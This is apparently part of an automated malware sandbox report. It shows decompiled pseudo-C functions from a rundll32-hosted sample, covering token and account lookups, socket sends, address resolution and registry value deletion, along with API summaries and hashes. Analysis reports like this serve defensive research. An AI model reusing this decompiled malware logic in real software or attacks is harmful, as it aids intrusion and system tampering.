                                                            0x04638513
                                                            0x046383ab
                                                            0x046383ab
                                                            0x046383b7
                                                            0x046383c2
                                                            0x046383ce
                                                            0x046383ce
                                                            0x046383a9
                                                            0x04638395
                                                            0x04638381
                                                            0x04638344

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,046387F8,04638B6E,00000000,?,?,04638B6E,0467E024,?), ref: 0463825B
                                                              • Part of subcall function 0463ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04638329,?,04638B6E,0467E024,?), ref: 0463ABD5
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000150,00000000,?,04638B6E,0467E024,?), ref: 0463833C
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04638B6E,0467E024,?), ref: 04638376
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04638B6E,0467E024,?), ref: 0463838B
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0463839F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID:
                                                            • API String ID: 1949328396-0
                                                            • Opcode ID: f7223a07ee404dc593219f9cfb6d1dec3ed7b56f4eb079a8222ebaecc6b1e6b8
                                                            • Instruction ID: f7c7040bbbefd9e8af2b3b1f8d9b589a33b86079a57e9217eeede44504d638a3
                                                            • Opcode Fuzzy Hash: f7223a07ee404dc593219f9cfb6d1dec3ed7b56f4eb079a8222ebaecc6b1e6b8
                                                            • Instruction Fuzzy Hash: A141CCB0140B45ABF3309F65CC59B87BAE4EF00719F10491DE69AAA6D0D7F6B148CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E04644440(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v520;
                                                            				short _v1032;
                                                            				long _v1036;
                                                            				void* _v1040;
                                                            				long _v1044;
                                                            				long _v1048;
                                                            				union _SID_NAME_USE _v1052;
                                                            				signed int _t27;
                                                            				signed int _t51;
                                                            				signed short* _t59;
                                                            				void* _t64;
                                                            				void* _t65;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				signed int _t69;
                                                            
                                                            				_t56 = __ecx;
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t69;
                                                            				_t64 = __edx;
                                                            				_t67 = __ecx;
                                                            				E0465DEA0(__edx, __edx, 0, 0x208);
                                                            				_v1040 = 0;
                                                            				_v1036 = 0;
                                                            				E0465DEA0(_t64,  &_v520, 0, 0x200);
                                                            				E0465DEA0(_t64,  &_v1032, 0, 0x200);
                                                            				_v1044 = 0x100;
                                                            				_v1048 = 0x100;
                                                            				if(OpenProcessToken(_t67, 8,  &_v1040) == 0 || GetTokenInformation(_v1040, 1, 0, _v1036,  &_v1036) == 0 && GetLastError() != 0x7a) {
                                                            					L10:
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					_push(_v1036);
                                                            					_t68 = E0465EF79(_t56);
                                                            					if(_t68 == 0) {
                                                            						goto L10;
                                                            					} else {
                                                            						if(GetTokenInformation(_v1040, 1, _t68, _v1036,  &_v1036) == 0 || LookupAccountSidW(0,  *_t68,  &_v520,  &_v1048,  &_v1032,  &_v1044,  &_v1052) == 0) {
                                                            							L0465ED17(_t68);
                                                            							goto L10;
                                                            						} else {
                                                            							_t59 =  &_v520;
                                                            							_t65 = _t64 - _t59;
                                                            							do {
                                                            								_t51 =  *_t59 & 0x0000ffff;
                                                            								_t59 =  &(_t59[1]);
                                                            								 *(_t65 + _t59 - 2) = _t51;
                                                            							} while (_t51 != 0);
                                                            							L0465ED17(_t68);
                                                            							return E04655AFE(_v8 ^ _t69);
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444C1
                                                            • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444E6
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,74CB69A0), ref: 046444F0
                                                            • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000001,74CB69A0), ref: 0464452D
                                                            • LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000100,?,00000100,?), ref: 0464455E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                            • String ID:
                                                            • API String ID: 2790146286-0
                                                            • Opcode ID: ef2b58a3246a13bfa50f2d02e9c765d07ab259d648c9744965906c026398f295
                                                            • Instruction ID: 058f203e987996c2e053e82cda4c68e25fdaae3a3fed477c49b93f72d9c3f1bc
                                                            • Opcode Fuzzy Hash: ef2b58a3246a13bfa50f2d02e9c765d07ab259d648c9744965906c026398f295
                                                            • Instruction Fuzzy Hash: B24180B1900118AAEF25DB50DC45FEA77B8EF44304F4041A9EB09A6190FF75AE858B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E04637F60(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, signed char _a8) {
                                                            				void* _t53;
                                                            				void* _t59;
                                                            				intOrPtr _t60;
                                                            				intOrPtr _t61;
                                                            				void* _t66;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				intOrPtr* _t88;
                                                            				struct _SECURITY_ATTRIBUTES** _t90;
                                                            				void* _t92;
                                                            				intOrPtr* _t93;
                                                            				intOrPtr* _t97;
                                                            				intOrPtr* _t98;
                                                            				intOrPtr* _t100;
                                                            				void* _t104;
                                                            				void* _t108;
                                                            
                                                            				_t88 = __ecx;
                                                            				_t87 = __ebx;
                                                            				_t104 = _t108;
                                                            				_t92 = CreateEventW;
                                                            				_t97 = __ecx;
                                                            				 *__ecx = 0x467e280;
                                                            				_t53 = CreateEventW(0, 1, 1, 0);
                                                            				 *(_t97 + 4) = _t53;
                                                            				if(_t53 == 0) {
                                                            					_push(0x80004005);
                                                            					E04637AC0();
                                                            					goto L7;
                                                            				} else {
                                                            					_t3 = _t97 + 0x5c; // 0x5c
                                                            					_t90 = _t3;
                                                            					 *((intOrPtr*)(_t97 + 8)) = _a4;
                                                            					 *(_t97 + 0xc) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x10)) = 5;
                                                            					 *(_t97 + 0x14) = 0;
                                                            					 *(_t97 + 0x18) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x1c)) = 0xffffffff;
                                                            					 *(_t97 + 0x20) = 0;
                                                            					 *(_t97 + 0x24) = 0;
                                                            					 *(_t97 + 0x28) = 1;
                                                            					 *((intOrPtr*)(_t97 + 0x2c)) = 0x1000;
                                                            					 *((intOrPtr*)(_t97 + 0x30)) = 0x3c;
                                                            					 *((intOrPtr*)(_t97 + 0x34)) = 0x3c;
                                                            					 *((intOrPtr*)(_t97 + 0x38)) = 0xea60;
                                                            					 *((intOrPtr*)(_t97 + 0x3c)) = 0x4e20;
                                                            					 *(_t97 + 0x40) = 0;
                                                            					 *(_t97 + 0x44) = 0;
                                                            					 *(_t97 + 0x48) = 0;
                                                            					 *(_t97 + 0x4c) = 0;
                                                            					 *((intOrPtr*)(_t97 + 0x50)) = 3;
                                                            					 *(_t97 + 0x54) = 0;
                                                            					 *(_t97 + 0x58) = 0;
                                                            					 *_t90 = 0;
                                                            					_t90[1] = 0;
                                                            					_t90[2] = 0;
                                                            					E0463ADA0(_t90, 0, _t90, 0);
                                                            					_t108 = _t108 - 0xc;
                                                            					_t27 = _t97 + 0x68; // 0x68
                                                            					_t87 = _t27;
                                                            					_t88 = _t87;
                                                            					L0463ABB0(_t88, CreateEventW, __ebx);
                                                            					_t28 = _t97 + 0x14c; // 0x14c
                                                            					 *(_t97 + 0x148) = 0;
                                                            					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                            						L7:
                                                            						_push(0x80004005);
                                                            						E04637AC0();
                                                            						goto L8;
                                                            					} else {
                                                            						 *(_t97 + 0x168) = 0;
                                                            						 *(_t97 + 0x16c) = 0;
                                                            						 *(_t97 + 0x164) = 0;
                                                            						 *((intOrPtr*)(_t97 + 0x170)) = _t87;
                                                            						_t83 = CreateEventW(0, 0, 0, 0);
                                                            						 *(_t97 + 0x174) = _t83;
                                                            						_pop(_t87);
                                                            						if(_t83 == 0) {
                                                            							L8:
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L9;
                                                            						} else {
                                                            							_t84 = CreateEventW(0, 0, 0, 0);
                                                            							 *(_t97 + 0x178) = _t84;
                                                            							if(_t84 == 0) {
                                                            								L9:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								goto L10;
                                                            							} else {
                                                            								_t85 = CreateEventW(0, 0, 0, 0);
                                                            								 *(_t97 + 0x17c) = _t85;
                                                            								if(_t85 == 0) {
                                                            									L10:
                                                            									_push(0x80004005);
                                                            									E04637AC0();
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									_push(_t97);
                                                            									_t98 = _t88;
                                                            									_push(_t92);
                                                            									 *_t98 = 0x467e280;
                                                            									if( *((intOrPtr*)(_t98 + 0x50)) != 3) {
                                                            										E0464F850(_t88);
                                                            									}
                                                            									_t59 =  *(_t98 + 0x17c);
                                                            									_t93 = CloseHandle;
                                                            									if(_t59 == 0 || CloseHandle(_t59) != 0) {
                                                            										_t60 =  *((intOrPtr*)(_t98 + 0x178));
                                                            										if(_t60 == 0) {
                                                            											L17:
                                                            											_t61 =  *((intOrPtr*)(_t98 + 0x174));
                                                            											if(_t61 == 0) {
                                                            												L19:
                                                            												E0463AC60(_t98 + 0x164);
                                                            												DeleteCriticalSection(_t98 + 0x14c);
                                                            												_t88 = _t98 + 0x68;
                                                            												E0463AB40(_t87, _t88);
                                                            												_t65 =  *(_t98 + 0x5c);
                                                            												if( *(_t98 + 0x5c) != 0) {
                                                            													L0465ED17(_t65);
                                                            													_t108 = _t108 + 4;
                                                            													 *(_t98 + 0x5c) = 0;
                                                            													 *(_t98 + 0x60) = 0;
                                                            													 *(_t98 + 0x64) = 0;
                                                            												}
                                                            												_t66 =  *(_t98 + 4);
                                                            												if(_t66 == 0) {
                                                            													L23:
                                                            													 *_t98 = 0x467dfa4;
                                                            													return _t66;
                                                            												} else {
                                                            													_t66 = CloseHandle(_t66);
                                                            													if(_t66 == 0) {
                                                            														goto L27;
                                                            													} else {
                                                            														goto L23;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												_push(_t61);
                                                            												if( *_t93() == 0) {
                                                            													goto L26;
                                                            												} else {
                                                            													goto L19;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_push(_t60);
                                                            											if( *_t93() == 0) {
                                                            												goto L25;
                                                            											} else {
                                                            												goto L17;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L25:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L26:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L27:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										_push(_t104);
                                                            										_push(_t98);
                                                            										_t100 = _t88;
                                                            										L11();
                                                            										if((_a8 & 0x00000001) != 0) {
                                                            											_push(0x188);
                                                            											E04655B47(_t100);
                                                            										}
                                                            										return _t100;
                                                            									}
                                                            								} else {
                                                            									 *(_t97 + 0x180) = 0;
                                                            									 *(_t97 + 0x184) = 0;
                                                            									return _t97;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04638B27,0467E048,?), ref: 04637F7B
                                                              • Part of subcall function 0463ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04638329,?,04638B6E,0467E024,?), ref: 0463ABD5
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000,?,04638B27,0467E048,?), ref: 0463805C
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04638B27,0467E048,?), ref: 04638096
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04638B27,0467E048,?), ref: 046380AB
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046380BF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID:
                                                            • API String ID: 1949328396-0
                                                            • Opcode ID: 3ef4c1ba2d8541eaf2886ecc948d08f95debf425a95fec872dae7e500bcb3236
                                                            • Instruction ID: 148bc53edb51120f6f58b22992ba9dc0a6a4acce7f88257012576e0f96d3d293
                                                            • Opcode Fuzzy Hash: 3ef4c1ba2d8541eaf2886ecc948d08f95debf425a95fec872dae7e500bcb3236
                                                            • Instruction Fuzzy Hash: F841C1B0140B45ABF3309F65CC59B83BAE4EF10719F10491DE69AAA6D0D7F6B148CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 28%
                                                            			E0464D160(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed short* _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				signed short _v60;
                                                            				char _v176;
                                                            				char _v180;
                                                            				intOrPtr _v184;
                                                            				intOrPtr _v188;
                                                            				char _v200;
                                                            				intOrPtr _v204;
                                                            				void* __ebp;
                                                            				signed int _t27;
                                                            				char* _t33;
                                                            				signed short _t35;
                                                            				signed short* _t44;
                                                            				intOrPtr _t55;
                                                            				signed short _t60;
                                                            				char* _t65;
                                                            				void* _t66;
                                                            				signed int _t70;
                                                            				signed int _t72;
                                                            
                                                            				_t72 = (_t70 & 0xfffffff8) - 0xb4;
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t72;
                                                            				_t44 = _a4;
                                                            				asm("xorps xmm0, xmm0");
                                                            				asm("movups [esp+0xa0], xmm0");
                                                            				asm("movups [ebx+0x2], xmm0");
                                                            				asm("movq [ebx+0x12], xmm0");
                                                            				_t44[0xd] = 0;
                                                            				_v36 =  *_t44 & 0x0000ffff;
                                                            				_v184 = __edx;
                                                            				_v44 = 0;
                                                            				asm("movq [esp+0xb8], xmm0");
                                                            				_v12 = 0;
                                                            				_v40 = 0x100;
                                                            				_v180 =  &_v176;
                                                            				E0464D5B0( &_v176, _t44,  &_v180, __edi, __esi, __ecx, 3);
                                                            				_t33 =  &_v48;
                                                            				__imp__getaddrinfo(_v188, 0, _t33,  &_v52, __edi, __esi, __ebx);
                                                            				_t65 = _t33;
                                                            				_t34 = _v204;
                                                            				if(_v204 !=  &_v200) {
                                                            					L0465ED17(_t34);
                                                            					_t72 = _t72 + 4;
                                                            				}
                                                            				if(_t65 == 0) {
                                                            					_t60 = _v60;
                                                            					_t66 = 0;
                                                            					_t35 = _t60;
                                                            					if(_t60 != 0) {
                                                            						asm("o16 nop [eax+eax]");
                                                            						while(1) {
                                                            							_t55 =  *((intOrPtr*)(_t35 + 4));
                                                            							if(_t55 == 2 || _t55 == 0x17) {
                                                            								break;
                                                            							}
                                                            							_t35 =  *(_t35 + 0x1c);
                                                            							if(_t35 != 0) {
                                                            								continue;
                                                            							} else {
                                                            							}
                                                            							goto L11;
                                                            						}
                                                            						_t35 = E0465E060(_t44,  *((intOrPtr*)(_t35 + 0x18)),  *((intOrPtr*)(_t35 + 0x10)));
                                                            						_t72 = _t72 + 0xc;
                                                            						_t66 = 1;
                                                            					}
                                                            					L11:
                                                            					__imp__freeaddrinfo(_t60);
                                                            					if(_t66 == 0) {
                                                            						__imp__#112();
                                                            						return E04655AFE(_v32 ^ _t72, 0x2af9);
                                                            					} else {
                                                            						__imp__#9();
                                                            						_t44[1] = _t35;
                                                            						return E04655AFE(_v32 ^ _t72, _v204);
                                                            					}
                                                            				} else {
                                                            					__imp__#112();
                                                            					return E04655AFE(_v28 ^ _t72, _t65);
                                                            				}
                                                            			}
                                                            0x0464d166
                                                            0x0464d16c
                                                            0x0464d173
                                                            0x0464d17b
                                                            0x0464d17e
                                                            0x0464d183
                                                            0x0464d18d
                                                            0x0464d192
                                                            0x0464d19b
                                                            0x0464d1a4
                                                            0x0464d1af
                                                            0x0464d1b3
                                                            0x0464d1be
                                                            0x0464d1c7
                                                            0x0464d1d2
                                                            0x0464d1dd
                                                            0x0464d1e1
                                                            0x0464d1ee
                                                            0x0464d1fc
                                                            0x0464d202
                                                            0x0464d208
                                                            0x0464d20e
                                                            0x0464d211
                                                            0x0464d216
                                                            0x0464d216
                                                            0x0464d21b
                                                            0x0464d23b
                                                            0x0464d242
                                                            0x0464d244
                                                            0x0464d248
                                                            0x0464d24a
                                                            0x0464d250
                                                            0x0464d250
                                                            0x0464d256
                                                            0x00000000
                                                            0x00000000
                                                            0x0464d25d
                                                            0x0464d262
                                                            0x00000000
                                                            0x00000000
                                                            0x0464d264
                                                            0x00000000
                                                            0x0464d262
                                                            0x0464d26d
                                                            0x0464d272
                                                            0x0464d275
                                                            0x0464d275
                                                            0x0464d27a
                                                            0x0464d27b
                                                            0x0464d283
                                                            0x0464d2af
                                                            0x0464d2cb
                                                            0x0464d285
                                                            0x0464d289
                                                            0x0464d28f
                                                            0x0464d2a9
                                                            0x0464d2a9
                                                            0x0464d21d
                                                            0x0464d21e
                                                            0x0464d23a
                                                            0x0464d23a

                                                            APIs
                                                            • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0464D1FC
                                                            • WSASetLastError.WS2_32(00000000), ref: 0464D21E
                                                            • FreeAddrInfoW.WS2_32(?), ref: 0464D27B
                                                            • htons.WS2_32(?), ref: 0464D289
                                                            • WSASetLastError.WS2_32(00002AF9), ref: 0464D2AF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddrFreeInfogetaddrinfohtons
                                                            • String ID:
                                                            • API String ID: 3326967445-0
                                                            • Opcode ID: 575de2bee6ee0c504e19fa2049da87e1f9e455ee5f8f15997717a0d2e6c929ca
                                                            • Instruction ID: d24028697e0db877bfdfb07e4a4df7ae9ff54f922447504b1421253aec254ed6
                                                            • Opcode Fuzzy Hash: 575de2bee6ee0c504e19fa2049da87e1f9e455ee5f8f15997717a0d2e6c929ca
                                                            • Instruction Fuzzy Hash: 6141E272A083009BEB34DF64D884BABB3E4FF89310F01461DE94987651FB31A944C793
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E04654A50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void* _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _t36;
                                                            				long _t40;
                                                            				void** _t43;
                                                            				long _t46;
                                                            				void* _t49;
                                                            				intOrPtr _t53;
                                                            				LONG* _t57;
                                                            				void** _t64;
                                                            				void* _t67;
                                                            				signed int _t69;
                                                            
                                                            				_t36 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t36 ^ _t69;
                                                            				_t53 = _a4;
                                                            				_v16 = __ecx;
                                                            				if( *((intOrPtr*)(_t53 + 0x8c)) <= 0) {
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					_t57 = _t53 + 0x44;
                                                            					do {
                                                            						_t67 =  *(_t53 + 0x90);
                                                            						if(_t67 ==  *(_t53 + 0x94)) {
                                                            							if(_t67 != 0) {
                                                            								 *(_t53 + 0x90) = 0;
                                                            								 *(_t53 + 0x94) = 0;
                                                            								goto L6;
                                                            							}
                                                            						} else {
                                                            							_t49 =  *(_t67 + 0x2c);
                                                            							 *(_t53 + 0x90) = _t49;
                                                            							 *(_t49 + 0x30) = 0;
                                                            							L6:
                                                            							if(_t67 != 0) {
                                                            								 *(_t67 + 0x2c) = 0;
                                                            								 *(_t67 + 0x30) = 0;
                                                            								 *((intOrPtr*)(_t53 + 0x8c)) =  *((intOrPtr*)(_t53 + 0x8c)) - 1;
                                                            							}
                                                            						}
                                                            						_t40 =  *(_t67 + 0x1c);
                                                            						 *((intOrPtr*)(_t53 + 0x40)) =  *((intOrPtr*)(_t53 + 0x40)) - _t40;
                                                            						InterlockedExchangeAdd(_t57, _t40);
                                                            						 *((intOrPtr*)(_t67 + 0x34)) =  *((intOrPtr*)(_t53 + 0x88));
                                                            						_t43 =  &_v12;
                                                            						_v12 = 0;
                                                            						 *((intOrPtr*)(_t67 + 0x18)) = 3;
                                                            						 *(_t67 + 0x28) = 2;
                                                            						__imp__WSASend( *((intOrPtr*)(_t67 + 0x34)), _t67 + 0x1c, 1, _t43, 0, _t67, 0);
                                                            						if(_t43 != 0xffffffff) {
                                                            							_t64 = 0;
                                                            						} else {
                                                            							__imp__#111();
                                                            							_t64 = _t43;
                                                            						}
                                                            						if(InterlockedDecrement(_t67 + 0x28) == 0) {
                                                            							L14:
                                                            							_t46 = E0464C930(_v16 + 0xb0, _t67);
                                                            							if(_t46 == 0) {
                                                            								HeapFree( *( *(_t67 + 0x14)), _t46, _t67);
                                                            							}
                                                            							goto L16;
                                                            						} else {
                                                            							if(_t64 == 0) {
                                                            								goto L17;
                                                            							} else {
                                                            								if(_t64 != 0x3e5) {
                                                            									goto L14;
                                                            								}
                                                            								L16:
                                                            								if(_t64 == 0) {
                                                            									goto L17;
                                                            								}
                                                            							}
                                                            						}
                                                            						break;
                                                            						L17:
                                                            						_t57 = _t53 + 0x44;
                                                            					} while ( *((intOrPtr*)(_t53 + 0x8c)) > 0);
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				}
                                                            			}
                                                            0x04654a56
                                                            0x04654a5d
                                                            0x04654a61
                                                            0x04654a64
                                                            0x04654a6e
                                                            0x04654b98
                                                            0x04654a74
                                                            0x04654a75
                                                            0x04654a80
                                                            0x04654a80
                                                            0x04654a8c
                                                            0x04654aa2
                                                            0x04654aa4
                                                            0x04654aae
                                                            0x00000000
                                                            0x04654aae
                                                            0x04654a8e
                                                            0x04654a8e
                                                            0x04654a91
                                                            0x04654a97
                                                            0x04654ab8
                                                            0x04654aba
                                                            0x04654abc
                                                            0x04654ac3
                                                            0x04654aca
                                                            0x04654aca
                                                            0x04654aba
                                                            0x04654ad0
                                                            0x04654ad6
                                                            0x04654adb
                                                            0x04654aea
                                                            0x04654aed
                                                            0x04654af9
                                                            0x04654b00
                                                            0x04654b07
                                                            0x04654b0e
                                                            0x04654b17
                                                            0x04654b23
                                                            0x04654b19
                                                            0x04654b19
                                                            0x04654b1f
                                                            0x04654b1f
                                                            0x04654b31
                                                            0x04654b3f
                                                            0x04654b49
                                                            0x04654b50
                                                            0x04654b59
                                                            0x04654b59
                                                            0x00000000
                                                            0x04654b33
                                                            0x04654b35
                                                            0x00000000
                                                            0x04654b37
                                                            0x04654b3d
                                                            0x00000000
                                                            0x00000000
                                                            0x04654b5f
                                                            0x04654b61
                                                            0x00000000
                                                            0x00000000
                                                            0x04654b61
                                                            0x04654b35
                                                            0x00000000
                                                            0x04654b63
                                                            0x04654b6a
                                                            0x04654b6a
                                                            0x04654b85
                                                            0x04654b85

                                                            APIs
                                                            • InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04654ADB
                                                            • WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04654B0E
                                                            • WSAGetLastError.WS2_32 ref: 04654B19
                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 04654B29
                                                            • HeapFree.KERNEL32(?,00000000,?,?), ref: 04654B59
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                            • String ID:
                                                            • API String ID: 930714758-0
                                                            • Opcode ID: 072c038e0352d49342b0b80e8cdebe379534e1cc415b0e15974def9be19d9791
                                                            • Instruction ID: 000531fa5e29758a0b361021f7f3525c9900100ec7df00ab41abbbd0962c92a0
                                                            • Opcode Fuzzy Hash: 072c038e0352d49342b0b80e8cdebe379534e1cc415b0e15974def9be19d9791
                                                            • Instruction Fuzzy Hash: 44414B716002049FDB20DF65D888BAAB7B9FF54310F0542ADED0A8B299FF75A944CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E04640FE0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				void* _v24;
                                                            				intOrPtr* _v28;
                                                            				char _v32;
                                                            				char _t33;
                                                            				short* _t36;
                                                            				void* _t37;
                                                            				long _t38;
                                                            				short* _t51;
                                                            				char* _t54;
                                                            				intOrPtr* _t58;
                                                            				short* _t60;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				int _t63;
                                                            				void* _t64;
                                                            				void* _t65;
                                                            				void* _t66;
                                                            
                                                            				_t61 = _a8;
                                                            				_t58 = _a4 + 1;
                                                            				_v20 = __ecx;
                                                            				_v28 = _t58;
                                                            				_v24 = 0;
                                                            				_t33 = _t61 - 1 + _t58;
                                                            				_v32 = _t33;
                                                            				if(_t33 - _t58 >= 4) {
                                                            					_v8 =  *_t58;
                                                            					_v28 = _t58 + 4;
                                                            				} else {
                                                            					_v24 = 1;
                                                            					_v8 = 0;
                                                            				}
                                                            				_t36 = E04640D20( &_v32);
                                                            				_t54 =  &_v32;
                                                            				_t51 = _t36;
                                                            				_t37 = E04640D20(_t54);
                                                            				_t60 = _t37;
                                                            				if(_v24 == 0) {
                                                            					_t38 = _t61 + 4;
                                                            					_v12 = _t38;
                                                            					_t62 = LocalAlloc(0x40, _t38);
                                                            					_v16 = _t62;
                                                            					E0465E060(_t62, _a4, _a8);
                                                            					_t66 = _t65 + 0xc;
                                                            					_t63 = 0;
                                                            					_a4 = _a8 + _t62;
                                                            					_a8 = 0;
                                                            					if(RegOpenKeyExW(_v8, _t51, 0, 0x102,  &_a8) == 0) {
                                                            						RegDeleteValueW(_a8, _t60);
                                                            						asm("sbb esi, esi");
                                                            						_t63 = 1;
                                                            						RegCloseKey(_a8);
                                                            					}
                                                            					_push(_t54);
                                                            					_push(0x3f);
                                                            					_push(_v12);
                                                            					 *_a4 = _t63;
                                                            					_t64 = _v16;
                                                            					_push(_t64);
                                                            					E04631C60( *((intOrPtr*)(_v20 + 4)));
                                                            					_t37 = LocalFree(_t64);
                                                            					if(_t51 != 0) {
                                                            						_t37 = L04655B0F(_t51);
                                                            						_t66 = _t66 + 4;
                                                            					}
                                                            					if(_t60 != 0) {
                                                            						return L04655B0F(_t60);
                                                            					}
                                                            				}
                                                            				return _t37;
                                                            			}
                                                            0x04640feb
                                                            0x04640fee
                                                            0x04640ff0
                                                            0x04640ff3
                                                            0x04640ff9
                                                            0x04641000
                                                            0x04641002
                                                            0x0464100a
                                                            0x04641021
                                                            0x04641024
                                                            0x0464100c
                                                            0x0464100c
                                                            0x04641013
                                                            0x04641013
                                                            0x0464102a
                                                            0x0464102f
